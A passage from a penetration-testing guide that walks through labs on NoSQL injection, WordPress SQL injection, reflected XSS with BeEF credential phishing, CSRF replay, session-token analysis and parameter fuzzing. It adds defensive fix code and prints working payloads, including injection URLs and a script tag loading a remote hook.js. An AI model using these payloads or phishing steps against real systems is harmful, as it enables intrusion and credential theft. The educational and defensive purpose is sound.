Next, we need to populate the MongoDB database. In a terminal window type: 
• mongo 
◦ use appUserData 
◦ db.createCollection("users") 
◦ show collections 
◦ db.users.insert( {"name":"james","username":"james","email":"james: 
◦ db.users.insert( {"name":"frank","username":"frank","email":"frank@; 
◦ db.users.insert( {"name":"paul","username":"paul","email":"paul@su 


If everything worked out, it should look like this when you query a user: 


[Screenshot: the User Profile Lookup page on 192.168.199.128 after searching for "paul". The page prints the MongoDB $where function it ran, function () { var query = 'paul'; return this.username == query;}, then "1 user found." with Name: paul, Username: paul, Email: paul@suck.testlab, above the "Enter your username" search form]


Sample Vulnerable NoSQL Application 


If you see this, that's great! You have a MongoDB installation and webpage utilizing that backend 
NoSQL database. Now, we want to see if we can attack this MongoDB installation. In the following 
example, we are going to use a tool called NoSQLMap. 


[Screenshot: the NoSQLMap main menu in a terminal at /opt/NoSQLMap: 1-Set options, 2-NoSQL DB Access Attacks, 3-NoSQL Web App attacks, 4-Scan for Anonymous MongoDB Access, 5-Change Platform (Current: MongoDB), x-Exit, then "Select an option:"]





NoSQLMap 


We need to execute the nosqlmap.py script and set the vulnerable IP and GET parameters. 


Attacking MongoDB: 
• cd /opt/NoSQLMap 
• python nosqlmap.py 
• 1 - Set Options 
◦ Set options for target host IP (your Mongo IP) 
◦ Set App Path to: /vuln_apps/userdata.php?usersearch=paul&submitbutton=Submit 
◦ Set my local MongoDB IP (your host) 
◦ b - Save option file 
◦ x - Exit 


We have now set the configuration of the vulnerable site, so let’s attack the web application that uses 
a MongoDB backend: 


• 3 - NoSQL Web App attacks 
• Baseline test - Enter random string size: 5 
• 1 - Alphanumeric 
• 1 - usersearch 


NoSQLMap is taking each variable in the GET parameter and testing common NoSQL injection 
techniques. If everything is successful, you will see something like the following: 


[Screenshot: NoSQLMap web app attack results. Test 8 (PHP/ExpressJS > Undefined Injection) fails; the timing-based tests then report the JavaScript string escape injection as possible (HTTP load time variance of 30.0 seconds) and the integer escape as not; "MongoDB < 2.4 detected". Two vulnerable URLs are listed for the usersearch parameter (the a'; return db.a.find(); var dummy='! and a'; return this.a != 'WC4Uo'; var dummy='! payloads), followed by several "possibly vulnerable" URLs. Timing based attacks: String attack - Successful, Integer attack - Unsuccessful; NoSQLMap then offers to save the results to a file]
NoSQLMap - Scanner Results 


Right away, NoSQLMap identified two URLs that are vulnerable. Browsing those URLs, we see that 
the variable usersearch is vulnerable and that we can inject NoSQL commands into that GET 
parameter. 


• http://192.168.199.128:80/vuln_apps/userdata.php?usersearch=a'; return db.a.find(); var dummy='!&submitbutton=Submit 


Running that query in a browser, we see something that is equivalent to a select * from usersearch; in 
SQL. 


[Screenshot: the lookup page after the injected query. It prints function () { var query = 'a'; return db.a.find(); var dummy='!'; return this.username == query;} and "3 user found.": james (james@suck.testlab), frank (frank@suck.testlab) and paul (paul@suck.testlab), above the search form]


NoSQL Injection 


We have just dumped that collection and all of its users. Although many people have stated that 
traditional SQL injection attacks do not work on NoSQL databases, this is only partly true. The 
concept behind SQL injection attacks is still sound against NoSQL technologies, regardless of database 
syntax. 
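The root cause is visible in the screenshots: userdata.php splices the usersearch value into the JavaScript of a MongoDB $where clause. The following added example (not the NoSQL_Test app's own code) shows that query builder beside a fixed one and evaluates both against an in-memory stand-in for the users collection, so it runs without mongod; the stand-in's find() and the payload constant are the only things assumed beyond what the lab shows.

```javascript
'use strict';
// Added example, not the NoSQL_Test/userdata.php code itself: why the usersearch
// lookup above is injectable, and the fix. The lab page builds a MongoDB $where
// clause by splicing the parameter into JavaScript source (the
// "function () { var query = 'paul'; ..." text in the screenshots); the fixed
// lookup sends a plain query document, so the input can only ever be data.

// Vulnerable: user input becomes part of server-side JavaScript.
function buildWhereQuery(usersearch) {
  return {
    $where: `function () { var query = '${usersearch}'; return this.username == query; }`,
  };
}

// Fixed: equality match on a string field, with a whitelist on the value.
// The typeof check also stops operator injection such as usersearch[$ne]=x,
// which PHP's $_GET (and Express's query parser) would turn into {"$ne": "x"}.
function buildSafeQuery(usersearch) {
  if (typeof usersearch !== 'string' || !/^[A-Za-z0-9_.-]{1,64}$/.test(usersearch)) {
    throw new Error('invalid username');
  }
  return { username: usersearch };
}

// Stand-in for the "users" collection populated in the LAB, so this runs offline.
const USERS = [
  { name: 'james', username: 'james', email: 'james@suck.testlab' },
  { name: 'frank', username: 'frank', email: 'frank@suck.testlab' },
  { name: 'paul',  username: 'paul',  email: 'paul@suck.testlab' },
];

// Minimal find(): a $where string is evaluated once per document with `this`
// bound to the document (what mongod does); other keys are exact-equality matches.
function find(collection, query) {
  if (typeof query.$where === 'string') {
    const fn = new Function(`return (${query.$where}).call(this);`);
    return collection.filter(doc => Boolean(fn.call(doc)));
  }
  return collection.filter(doc =>
    Object.keys(query).every(k => doc[k] === query[k]));
}

// The second vulnerable URL NoSQLMap reported above, URL-decoded. The injected
// "return this.a != 'WC4Uo'" is true for every document, so the whole collection
// comes back exactly as in the "3 user found." screenshot.
const NOSQLMAP_PAYLOAD = "a'; return this.a != 'WC4Uo'; var dummy='!";

function demo() {
  return {
    whereNormal:   find(USERS, buildWhereQuery('paul')).length,            // 1
    whereInjected: find(USERS, buildWhereQuery(NOSQLMAP_PAYLOAD)).length,  // 3
    safeNormal:    find(USERS, buildSafeQuery('paul')).length,             // 1
  };
}
```

On the server side, mongod's --noscripting option (security.javascriptEnabled: false in the YAML config of newer releases) disables server-side JavaScript entirely, so $where stops being an attack surface even where an application forgets the fix.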


CMS - Content Management Systems 
To continue on the topic of vulnerable web applications, I am always finding different types of 
content management systems (CMS) through my penetration tests. From what I have seen, Nessus will 
pick up some of the CMS issues, but most are found through more manual testing. To help speed up 
the initial scans of CMS sites, I like to use a couple of tools, listed below. 


CMSmap Lab 

(https://github.com/Dionach/CMSmap)(Kali Linux): 

CMSmap is a vulnerability scanner written by Dionach and automates and validates issues in 
numerous CMS applications. Let’s walk through an example from initial finding to exploitation. On 
our OWASPBWA VM, there is a WordPress site on which we can test the scanner: http://[ Vulnerable 
OWASPBWA IP]/wordpress/. 


Vulnerable Wordpress Site 


CMS sites have historically had huge numbers of vulnerabilities, so let’s scan this site using 
CMSmap to see what we can find: 

• cd /opt/CMSmap 

• ./cmsmap.py -t http://[Vulnerable OWASPBWA IP]/wordpress/ 


CMSMap - Scanner Results 


A lot of different findings will come up and it is really just about playing around with them to find the 
right ones to exploit. In this case, we will take one of the verified vulnerabilities: 
• [M] EDB-ID: 5486 Date: 2008-04-22 Verified: Yes Title: Wordpress Plugin 
Spreadsheet <= 0.6 - SQL Injection Vulnerability 


A quick Google search of EDB-ID: 5486 points to: 
• http://www.exploit-db.com/exploits/5486/ 
• And the exploit code looks like this: wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from -&display=plain 


So this looks to be an SQL injection vulnerability that queries the database for the users, passwords, 
and emails. Let's open a browser to this page: 


• http://172.16.151.144/wordpress/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+%281=0%29+union+select+1,concat%28user_login,0x3a,user_pass,0x3 -&display=plain, and we see the hash of the admin account. 


[Screenshot: the browser shows admin:21232f297357a5a743894a0e43801fc3:admin@example.org]


WordPress Exploit 


Great—we just got the hash to the admin account, which we can crack and, if successful, connect back 
to the database or SSH into the server. 


For more in-depth WordPress vulnerability scanning, look at also using WPScan 
(https://github.com/wpscanteam/wpscan): 

• cd /opt/wpscan 

• ruby ./wpscan.rb --url http://[WordPress IP]/ 


WPScan is not only a vulnerability scanner for WordPress, but also has functionality for brute-forcing 
accounts, enumerating plugins, enumerating users, and other discovery tools. 


Cross-Site Scripting (XSS) 


I can't talk about web application vulnerabilities without talking about Cross-Site Scripting (XSS). 
This is probably one of the most common vulnerabilities that I come across. XSS is an attack against the user that 
is caused by a lack of input validation by the application. There are two types of XSS: reflective 
(non-persistent) and stored (persistent). Both allow an attacker to have script code run in a user's 
browser. I am going to focus on reflective XSS, which is the more common type and is relatively 
similar to stored XSS in terms of vulnerability exploitation. 


BeEF Exploitation Framework 
(http://beefproject.com/)(Kali Linux) 


The general question I get from my clients is, "How much harm can an XSS really cause?" With this 
vulnerability you have the full ability to write scripting code on the end user's browser, so anything 
that you do in JavaScript could be used against the victim. In this section, we will dive into how 
malicious you can be with an XSS attack. 


The best tool I have seen used with XSS attacks is the BeEF Exploitation Framework. If you find an 
XSS, not only can you cause a victim to become part of your pseudo-botnet, but you can also steal the 
contents of the clipboard (copy memory), redirect them to links, turn on their camera, and so much more. 


If you do find a valid XSS on a site, you will need to craft your XSS findings to utilize the BeEF 
Framework. For our XSS examples in this chapter, we are going to use an XSS that was identified 
from our initial Burp Active Scans. Let's take the example vulnerable URL: 
http://www.securepla.net/xss_example/example.php?alert=test'<script>[iframe]</script>. 

From the Setting Up a Penetration Box section, we installed BeEF into /opt/beef/. 


We are going to have to first start the BeEF service. 


Starting BeEF Commands: 
• cd /opt/beef/ 
• ./beef 


[Screenshot: BeEF (Browser Exploitation Framework) 0.4.6.0-alpha starting in a terminal; the console prints the bind socket listening on 0.0.0.0:3000, the UI URL and the Hook URL]





Starting Up BeEF 


Let's log into the console UI after the BeEF server has started. As we see from the image above, the 
UI URL in this case is located at http://127.0.0.1:3000/ui/authentication. We can open a browser and 
go to that URL. 







BeEF Login Screen 


If everything started up successfully, you will be able to log into the UI using the username “beef” and 
password “beef”. If we look at the image where we loaded BeEF via the command line, we see a 
URL for both the UI page and the hook page (Hook URL). Let's take a moment to review the hook 
page (hook.js). 




BeEF Client Side JavaScript 


Although this JavaScript has been well obfuscated, this is the payload that will control the victim user and will be injected into the victim browser's page. Once injected, their browser will connect back to your central server without the victim being aware.


LAB - XSS on OWASPBWA 
We were able to identify an XSS via Burp or ZAP on our vulnerable Web Application VM 
(OWASPBWA). So, we can directly access the vulnerable XSS by connecting to our web service: 


• [IP of OWASPBWA]/owaspbricks/content-2/index.php?user=harry3a201<script>alert(1)<%2fscript>


Since we have located an XSS vulnerability on a page, we can now use BeEF to help with the exploitation of the end user. In our initial example, http://[IP_of_OWASPBWA]/owaspbricks/content-2/index.php?user=, the user variable takes any input and presents it to the end user. This proves that the end user's browser does process the JavaScript code embedded in our query.





[Screenshot: the Bricks content-2 page at index.php?user=harry3a201<script>alert(1)<%2fscript> with the alert(1) dialog fired]

Bricks - XSS


To create a successful exploit, instead of printing an alert, we are going to craft a URL that uses 
JavaScript to include the hook.js file. It will look something like: 
• http://192.168.1.124/owaspbricks/content-2/index.php?user=harry3a201<script src=http://192.168.1.123:3000/hook.js></script>


I was able to append the hook.js script by using the JavaScript code: 
• <script src=[URL with hook.js]></script>


Remember that if this is done on a public site, then the URL will need to point to a public address that hosts the hook.js page and listening service.


Once you trick a victim into going to that URL using Social Engineering Tactics, they will become a 
part of your XSS zombie network. Going back to our UI panel, we should now see that a victim has 
joined our server. 


[Screenshot: BeEF UI panel at 127.0.0.1:3000/ui/panel with the hooked browser listed under Online Browsers and the Module Tree expanded: Browser (52), Hooked Domain (24) with modules such as Fingerprint Ajax, Get Cookie, Get Form Values, Get Local Storage, Get Page HREFs, Get Page HTML, Get Page and iframe HTML, Get Session Storage, Get Stored Credentials, Overflow Cookie Jar, Remove stuck iframe, Replace HREFs]

BeEF Client Attacks


With an account hooked, there are many different modules within BeEF to exploit the end user. As 
seen in the image above, you can try to steal stored credentials, get host IP information, scan hosts 
within their network, and much more. 


One of my favorite attacks is called "Pretty Theft" because of its simplicity. Drop down to the Social Engineering folder, select Pretty Theft, then configure it how you want (in this case, we will use the Facebook example), and hit Execute. Remember that the IP for the custom logo field has to be your BeEF IP. This will allow the victim to grab the image from your server.


[Screenshot: BeEF Commands tab for the hooked browser. The Module Tree has the Social Engineering (21) folder expanded (Steal Autocomplete, Fake LastPass, Clickjacking, Clippy, Fake Flash Update, Fake Notification Bar for Chrome/Firefox/IE, Firefox Extension variants, Google Phishing, Lcamtuf Download, Pretty Theft). Pretty Theft is selected, described as "Asks the user for their username and password using a floating div", with Dialog Type set to Facebook, Backing set to Grey, and Custom Logo pointing at the BeEF server on port 3000]

Pretty Theft Facebook Attack


After the attack is submitted, a Facebook password prompt will pop up onto the victim's system. This 
is where you can get creative by using a popup in which your target users would most likely enter 
their information. If you are looking to gain Google accounts, there is also a Google Phishing module. 


The benefit of this client-side attack is that the ordinary-looking password prompt popup keeps the 
user unaware that they are part of this zombie network. 


[Screenshot: the victim's browser on 192.168.1.124 showing the injected Facebook-styled dialog: "Your session has timed out due to inactivity. Please re-enter your username and password to"]

Pretty Theft Attack


After the unsuspecting victim types in their password, go back to the UI to find your loot. Clicking on 
the ID “0” will show the attacker what the victim typed into that box. This should be enough to start 
gaining some access as the user, allowing you to move laterally through the environment. 


[Screenshot: BeEF Commands tab, Module Results History for Pretty Theft showing command 0 (Fri Mar 13 2015 16:32:47) and its Command results: "data: answer=pwned:pwned"]

Pretty Theft Results


I hope I was able to demonstrate how powerful an XSS vulnerability can be. It is exponentially worse if the XSS finding was a stored XSS versus the reflected XSS example we just saw. If it had been a stored XSS, we most likely wouldn't even need to use social engineering tactics to get the victim to go to the link; we would just need to wait until our code was executed by the victim's system.


Cross-Site Scripting Obfuscation: 

A common problem for an attacker injecting code is that the application implements some sort of input validation for the vulnerable XSS fields. This means the XSS is still valid, but you don't have all the normal characters you need to successfully take advantage of the vulnerability. However, the great thing for a pentester is that these filters are usually improperly configured.


Fortunately, since there are so many different types of ways to encode your XSS attacks, the filters 
from the input validation scripts usually fail. You really could write an entire book about how to craft 
different XSS attacks, but here are my quick and dirty tricks to get a working list of encoders. 


Crowd Sourcing 
One of my favorite methods to find a huge number of valid XSS vulnerabilities is to visit http://www.reddit.com/r/xss. People will post the different XSS findings they have come across on that sub-reddit. This is a great way to see what other types of XSS vulnerabilities people are finding. Scanners are good; however, they can never replace a human eye. A lot of the findings on this sub-reddit were not found by an automated process, but found manually.


I created a quick script to grab and parse all the results from the crowd-sourced sub-reddit. To kick 
off your own scan: 

• cd /opt/reddit_xss/
• python reddit_xss.py

[Screenshot: reddit_xss.py running and scraping the XSS posts from /r/xss]

Reddit XSS Scrape


Once completed, a file named output_xss.txt will be generated. As you will see in your output, people will obfuscate XSS attacks with fromCharCode, percent encoding, HTML entities, and other JavaScript constructs. Now, you are armed with a good list of XSS examples (many of them still active) and encodings. One quick additional note: I do not recommend that you visit the vulnerable sites with the XSS payloads, as you could be seen as attacking their website. What I wanted to do was show you how to generate a good list of encoding examples that might help you in your attacks.


OWASP Cheat Sheet 
Another resource I often use is the OWASP Evasion Cheat Sheet. This is usually the first place I look 
whenever I run into an encoding problem on any of my engagements. 


The cheat sheet can be found here: 


https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet


The most common XSS problems I find usually arise from length restrictions or the fact that the greater-than/less-than symbols are not allowed. Luckily, the OWASP cheat sheet has many different examples to get around these issues.
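Seen from the defending side, the reason the filter tricks above keep working is that blacklists fix the proof-of-concept string rather than the sink. The Python below is an added example, not code from the book, OWASP Bricks or BeEF: a constructed stand-in for the content-2 page that reflects the user parameter verbatim, the same page behind a typical blacklist filter, and the same page with contextual output encoding. The two query strings are the two payloads the lab above uses (the alert and the hook.js include); the page template, the function names and the body_has_raw_markup check are my assumptions.

```python
import html
from urllib.parse import parse_qs

# Constructed stand-in for the Bricks content-2 page: the "user" value is written into HTML text.
PAGE_TEMPLATE = "<html><body><p>Hello {user}</p></body></html>"


def _user_param(query_string):
    """Pull the user value out of the query string; parse_qs percent-decodes it (%2f -> /)."""
    return parse_qs(query_string, keep_blank_values=True).get("user", [""])[0]


def render_vulnerable(query_string):
    """Reflect the parameter untouched, which is what the vulnerable page does."""
    return PAGE_TEMPLATE.format(user=_user_param(query_string))


def naive_filter(value):
    """A typical blacklist 'fix': strip exactly the tags that appeared in the proof of concept."""
    return value.replace("<script>", "").replace("</script>", "")


def render_filtered(query_string):
    """The page behind the blacklist filter."""
    return PAGE_TEMPLATE.format(user=naive_filter(_user_param(query_string)))


def render_hardened(query_string):
    """Contextual output encoding: escape at the point where the value enters HTML text."""
    return PAGE_TEMPLATE.format(user=html.escape(_user_param(query_string), quote=True))


def body_has_raw_markup(rendered):
    """Regression check for the reflected field: does any unescaped < or > survive in it?"""
    field = rendered.split("<p>Hello ", 1)[1].split("</p>", 1)[0]
    return "<" in field or ">" in field


# The two payloads from the lab, as the query strings the page would receive.
ALERT_QUERY = "user=harry3a201<script>alert(1)<%2fscript>"
HOOK_QUERY = "user=harry3a201<script src=http://192.168.1.123:3000/hook.js></script>"

if __name__ == "__main__":
    for name, renderer in (("vulnerable", render_vulnerable),
                           ("blacklist", render_filtered),
                           ("escaped", render_hardened)):
        for label, query in (("alert", ALERT_QUERY), ("hook.js", HOOK_QUERY)):
            print(f"{name:10s} {label:8s} raw markup survives: {body_has_raw_markup(renderer(query))}")
```

The blacklist stops the demo string and nothing else; the opening tag with an attribute sails through, which is the pattern behind the "filters are usually improperly configured" observation. Escaping the value for the HTML text context neutralises both payloads without needing to know what the attacker will send.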


Cross-Site Request Forgery (CSRF) 


Cross-Site Request Forgery basically allows you to force an unwanted action onto the victim. For 
example, you send a link to someone who is currently logged into their bank account. When that 
person accesses your link, it automatically transfers money out of their account into your account. 
This happens when there is no verification process to check that the user went through the appropriate 
steps to transfer money. 


What I mean is that in order to transfer money, a user needs to log in, go to their transfer payment page, select the recipient and then transfer the money. When these appropriate steps are taken, a CSRF token is generated on each and every page as you progress through the application. Additionally, the previous token is verified before the next step can process. You can think of this as a tracking system: if any of those tokens are empty or wrong, the transaction does not process.


There are many complex ways to test this, but the easiest way to manually run these tests is through 
proxying traffic. I will go through the process of making a transaction as described above and see if I 
can replay it. However, in the replay, my goal is to get the same end result without having to go 
through all of the steps, which proves that there is a CSRF vulnerability. 
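To make the token mechanism just described concrete, here is an added Python example (not the book's code and not any real bank's implementation): a constructed in-memory BankApp whose transfer endpoint takes the same User and Dollar parameters as the example that follows, run once without CSRF protection and once with a per-session, single-use token. replay_scenario is the Repeater test the text describes; forged_link_scenario is the logged-in victim following a link. The account names, balances and the csrf_token parameter are constructed.

```python
import hmac
import secrets


class BankApp:
    """Constructed stand-in for a bank.php transfer endpoint; not the site used in the book."""

    def __init__(self, csrf_protected):
        self.csrf_protected = csrf_protected
        self.sessions = {}      # session cookie -> {"user": name, "csrf": token or None}
        self.balances = {"alice": 1000.00, "victor": 1000.00, "frank": 0.00}

    def login(self, user):
        cookie = secrets.token_urlsafe(32)
        self.sessions[cookie] = {"user": user, "csrf": None}
        return cookie

    def transfer_page(self, cookie):
        """Rendering the transfer form issues a fresh single-use token bound to this session."""
        token = secrets.token_urlsafe(32)
        self.sessions[cookie]["csrf"] = token
        return token

    def transfer(self, cookie, params):
        """Equivalent of bank.php?User=Frank&Dollar=123.44, plus an optional csrf_token parameter."""
        session = self.sessions.get(cookie)
        if session is None:
            return "401 not logged in"
        if self.csrf_protected:
            expected = session["csrf"]
            supplied = params.get("csrf_token", "")
            # Constant-time comparison; a missing or already-consumed token never matches.
            if expected is None or not hmac.compare_digest(expected.encode(), supplied.encode()):
                return "403 CSRF token missing or invalid"
            session["csrf"] = None   # consume it: an identical replay fails the check above
        amount = float(params["Dollar"])
        recipient = params["User"].lower()
        self.balances[session["user"]] -= amount
        self.balances[recipient] = self.balances.get(recipient, 0.0) + amount
        return f"Bank Transfer Accepted For Users {params['User']} For the Amount : ${amount:.2f}"


def replay_scenario(csrf_protected):
    """Legitimate transfer, then the identical request sent again (what Repeater's Go does)."""
    app = BankApp(csrf_protected)
    cookie = app.login("alice")
    request = {"User": "Frank", "Dollar": "123.44"}
    if csrf_protected:
        request["csrf_token"] = app.transfer_page(cookie)
    first = app.transfer(cookie, request)
    replay = app.transfer(cookie, dict(request))
    return first, replay, app.balances["frank"]


def forged_link_scenario(csrf_protected):
    """A logged-in victim follows a link carrying the transfer URL. The browser attaches the
    session cookie automatically, but whoever wrote the link never saw the victim's token."""
    app = BankApp(csrf_protected)
    cookie = app.login("victor")
    result = app.transfer(cookie, {"User": "Frank", "Dollar": "123.44"})
    return result, app.balances["frank"]


if __name__ == "__main__":
    for protected in (False, True):
        print(f"csrf_protected={protected}")
        print("  replay:", replay_scenario(protected)[1])
        print("  forged link:", forged_link_scenario(protected)[0])
```

Two properties matter in the protected version: the token is tied to the session that rendered the form, so a request arriving with the cookie alone is rejected, and it is consumed on use, so the exact bytes captured in the proxy cannot be replayed. Compare with hmac.compare_digest rather than == to keep the check timing-independent.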


Using Burp for CSRF Replay Attacks 
Let's take an example where a bank application allows transfers from one user to another. In the URL below, there are two parameters that are used. The first parameter is User (to whom the money will go). The second parameter is the dollar amount. In the case below, we successfully transferred money to Frank.


What would happen if I sent this same URL to another person who was already logged into the same 
bank application? Well, if a CSRF protection were not in place, it would transfer $123.44 from the 
victim host to Frank, instantly. 


[Screenshot: browser at securepla.net/xss_example/bank.php?User=Frank&... returning the text "Bank Transfer Accepted For Users Frank For the Amount : $123.44"]

CSRF Example


To test if this is possible, we first capture the request via Burp. Make sure that your browser is still 
proxying to Burp and make the request with user 1. This should work just fine as you went through the 
proper channels to make the transfer. You should be able to log in, go to the transfer page, fill in the 
information, and submit. 


In the example below, we can go to Burp's Proxy tab and the History to see our last requests. At the very bottom, we see the request for the bank transfer. We also see that there is a hook cookie, but nothing that looks like a CSRF token.


[Screenshot: Burp Proxy > History listing requests to www.securepla.net, googleads.g.doubleclick.net, clients1.google.com and gtglobal-ocsp.geotrust.com, with the bank transfer GET to securepla.net at the bottom. The raw request carries Host, User-Agent (Mozilla/5.0, Macintosh, Gecko), Accept, Accept-Language and Accept-Encoding headers plus the BeEF hook cookie, and no CSRF token]

Burp CSRF Example


To validate this, we can actually try to repeat the request. I usually try this method because it tells me 
instantly if I can repeat requests without having to perform any additional actions. 


If you right-click anywhere in the Raw Request area, the option to "Send to Repeater" appears. 





[Screenshot: Burp Proxy > History with the raw bank transfer request selected and the right-click menu open: Do an active scan, Do a passive scan, Send to Intruder, Send to Repeater, Send to Sequencer, Send to Comparer, Send to Decoder]

Sending to Burp's Repeater





Inside the Repeater Tab, pressing the Go button will repeat the request and the following response 
will be populated. The result in our example was that the amount was transferred again without any 
verification from the user that this request was actually intended. This is great because you could send 
that same link to every user of this bank and Frank would become an instant millionaire. 





[Screenshot: Burp Repeater with the request GET /xss_example/bank.php?User=Frank&Dollar=123.44 on the left and the response on the right: HTTP 200, Date: Sat, 02 Nov 2013 11:35:11 GMT, Server: Apache, Vary: Accept-Encoding, Content-Type: text/html, body "Bank Transfer Accepted For Users Frank For the Amount : $123.44"]

Executing Burp Repeater


The application shouldn't have allowed the user to transfer money again without going through all the steps required to create a transfer request. Without a CSRF token, you could have an unsuspecting victim click on a link and have unauthorized transfers occur. If you are looking for more information on CSRF attacks, go to OWASP's page:

// index.ph 





Session Tokens 


Session tokens are generally used for tracking sessions, as HTTP is a stateless protocol by default. What you want to look for in a session token are (1) that it cannot be guessed and (2) that it properly tracks a user. Other things you should look for are when session tokens expire, whether they are secure, that they validate input, and that they are properly utilized.


In this section, we are going to specifically look at making sure session tokens are properly 
randomized and that they can't be guessed. Using Burp Suite to capture an authentication process, we 
can see in the response that there is a set-cookie value for the session tokens. This is located under 
the main Proxy tab and sub-tab History. 


[Screenshot: Burp Proxy > History raw response to a POST /api/request_promo on reddit.com: HTTP/1.1 200 OK, Date: Sat, 30 Nov 2013 20:26:37 GMT, access-control-allow-credentials: true, content-type: application/json, x-frame-options: SAMEORIGIN, and a set-cookie header (Domain=reddit.com; Path=/) whose session value is a URL-encoded record number, the timestamp 2013-11-30T12:26:37 and a hex string. The JSON body returns a modhash and the same cookie value, "23148326,2013-11-30T12:26:37,8d2bf78b68a5a180454906924784107a93583c3c3"]

Burp's Raw Response





We can right-click within the raw response section and send this request to the Sequencer feature. 





[Screenshot: right-click menu on the raw response: Send to Spider, Do an active scan, Do a passive scan, Send to Intruder, Send to Repeater, Send to Sequencer, Send to Comparer, Send to Decoder, Show response in browser, Request in browser]

Sending the Raw Request to Sequencer


Once you click Send to Sequencer, jump over to the Sequencer tab and identify which session tokens are important to you. Once you pick your token, click Start live capture to start generating session tokens.





[Screenshot: Burp Sequencer > Live capture tab. "Select Live Capture Request: Send requests here from other tools to configure a live capture. Select the request to use, configure..." with Remove and Clear buttons, the request list (#, Host, Request) and the Start live capture button; below it "Token Location Within Response: Select the location in the response where the token appears" with a Custom location option, and Live Capture Options]

Selecting the Session Token


Once you start the capture, a new window will pop up and it will start processing/generating tokens. 
After so many tokens, it will give you summaries of entropy (randomness), character-level analysis 
(see image below), and bit-level analysis. In the image below, Burp Suite is analyzing the placement 
of each character. There are many other features within Burp's sequencer tool, so I recommend 
spending some time trying to understand how session tokens are generated. 
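As an added example of the character-level analysis Burp performs (my own Python, not Burp's algorithm and not code from the book), the block below generates two token streams, a constructed weak one modelled on the cookie visible in the raw response above (a record number followed by a timestamp) and one drawn from the OS CSPRNG, then runs a per-position entropy measure and a Burp-style too-common/too-rare check over both. The generator shapes, sample size and thresholds are my assumptions.

```python
import math
import secrets
from collections import Counter

HEX = "0123456789abcdef"
DIGITS = "0123456789"


def weak_tokens(n, start_ts=1385843197):
    """Constructed weak generator in the style of the cookie in the screenshot: an
    incrementing record id followed by a Unix timestamp. Not any real site's algorithm."""
    return [f"{23148326 + i:08d}{start_ts + i // 3:010d}" for i in range(n)]


def strong_tokens(n, nbytes=16):
    """128-bit tokens from the OS CSPRNG, rendered as 32 hex characters."""
    return [secrets.token_hex(nbytes) for _ in range(n)]


def position_entropy(tokens):
    """Shannon entropy in bits of the character distribution observed at each position."""
    length = len(tokens[0])
    if any(len(t) != length for t in tokens):
        raise ValueError("position analysis needs fixed-length tokens")
    total = len(tokens)
    entropies = []
    for pos in range(length):
        counts = Counter(t[pos] for t in tokens)
        entropies.append(-sum(c / total * math.log2(c / total) for c in counts.values()))
    return entropies


def weak_positions(tokens, alphabet, min_fraction=0.8):
    """Positions carrying less than min_fraction of the alphabet's maximum entropy."""
    ceiling = math.log2(len(alphabet))
    return [i for i, h in enumerate(position_entropy(tokens)) if h < ceiling * min_fraction]


def effective_bits(tokens):
    """Sum of per-position entropies. This is an upper bound on unpredictability, because it
    ignores correlation between positions (a counter's digits are not independent)."""
    return sum(position_entropy(tokens))


def character_anomalies(tokens, alphabet, z=5.0):
    """Burp-style finding: a character far more or less frequent at a position than a uniform
    draw predicts. Each count is Binomial(n, 1/|alphabet|); flag deviations beyond z sigma."""
    total = len(tokens)
    p = 1 / len(alphabet)
    expected, sigma = total * p, math.sqrt(total * p * (1 - p))
    findings = []
    for pos in range(len(tokens[0])):
        counts = Counter(t[pos] for t in tokens)
        for ch in alphabet:
            c = counts.get(ch, 0)
            if abs(c - expected) > z * sigma:
                kind = "too common" if c > expected else "too rare"
                findings.append(f"character {ch} is {kind} at position {pos} (count: {c})")
    return findings


if __name__ == "__main__":
    samples = (("weak", weak_tokens(2000), DIGITS), ("strong", strong_tokens(2000), HEX))
    for name, toks, alphabet in samples:
        print(f"{name}: {effective_bits(toks):.1f} effective bits, "
              f"weak positions {weak_positions(toks, alphabet)}")
        for line in character_anomalies(toks, alphabet)[:3]:
            print("  " + line)
```

The weak stream shows the failure mode Burp reports: whole positions are constant or cycle through a few digits, and the anomaly list fills up with "too common" entries. The CSPRNG stream stays near four bits per hex position with no anomalies at a five-sigma threshold. Treat effective_bits as a ceiling rather than a measurement; a token can pass every per-position test and still be a predictable counter, which is why the text recommends reading the generation code when you can.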


[Screenshot: Burp Sequencer live capture (8693 tokens, Requests: 8693, Errors: 0), Character-level analysis tab, showing the Character Count Analysis plotted by character position with significance levels from 100% down to <0.0001%, followed by the anomaly list:]

Anomalies
278 anomalies were identified in this test:
character 9 is too rare at position 24 (count: 1235, probability in a random sample: 0.0029%)
character 0 is too common at position 29 (count: 624, probability in a random sample: 0.00010%)
character 2 is too rare at position 29 (count: 276, probability in a random sample: less than 0.0001%)
character 3 is too common at position 29 (count: 683, probability in a random sample: less than 0.0001%)
character 5 is too rare at position 29 (count: 398, probability in a random sample: less than 0.0001%)
character 7 is too common at position 29 (count: 730, probability in a random sample: less than 0.0001%)
character 8 is too common at position 29 (count: 640, probability in a random sample: less than 0.0001%)
character 9 is too common at position 29 (count: 643, probability in a random sample: less than 0.0001%)

Character Position for Cookies


I leave a lot here to your own judgment because it takes experience to understand when session 
cookies are or aren't secure. Every major web application I have seen uses different types of 
implementations and algorithms to generate session tokens, so running something like the examples 
above or reviewing source code may be required. 


Additional Fuzzing/Input Validation 


Burp Suite is extremely extensible and has a lot of other features. One quick feature that I find 
extremely helpful during manual testing is the Intruder function. In the Intruder function, you have the 
ability to tamper with any part of the request and provide your own data. This would be very useful if 
you want to supply your own fuzzer input to test a variable. 


We are going to walk through a very high-level overview of how you could use the fuzzing feature. The basic idea of the following example is to access an online store and see why parameter fuzzing can be highly beneficial. The online store might only link to certain items from their website, but the content managers could have put up all of next week's sale items. They just wait for the next week and link the content from their main website homepage.


I used to see a lot of these types of issues for sites that do Black Friday sales. They will have all of 
their content and prices hosted, but not linked anywhere on their page or made available to the public. 
Brute-forcing through all of the parameters will allow an attacker to know which items will go on 
sale that following week, before the public is notified. 


I created a dummy website to demonstrate this exact issue. The website: 
www.securepla.net/tehc/hack.php?id=2, 
has a GET parameter called ID. You can modify this ID field from 1 to 2 to 3 and get different results. 





[Screenshot: browser at www.securepla.net/tehc/hack.php]

Brute Forcing Parameters


We want to brute-force through all the different parameter values to see which pages exist and which 
pages do not. Since we already have our traffic flowing through Burp, we can go to the Proxy tab and 
then to your History tab. You will see all your past requests there. Right-click on that last request and 
click “Send to Intruder”. 


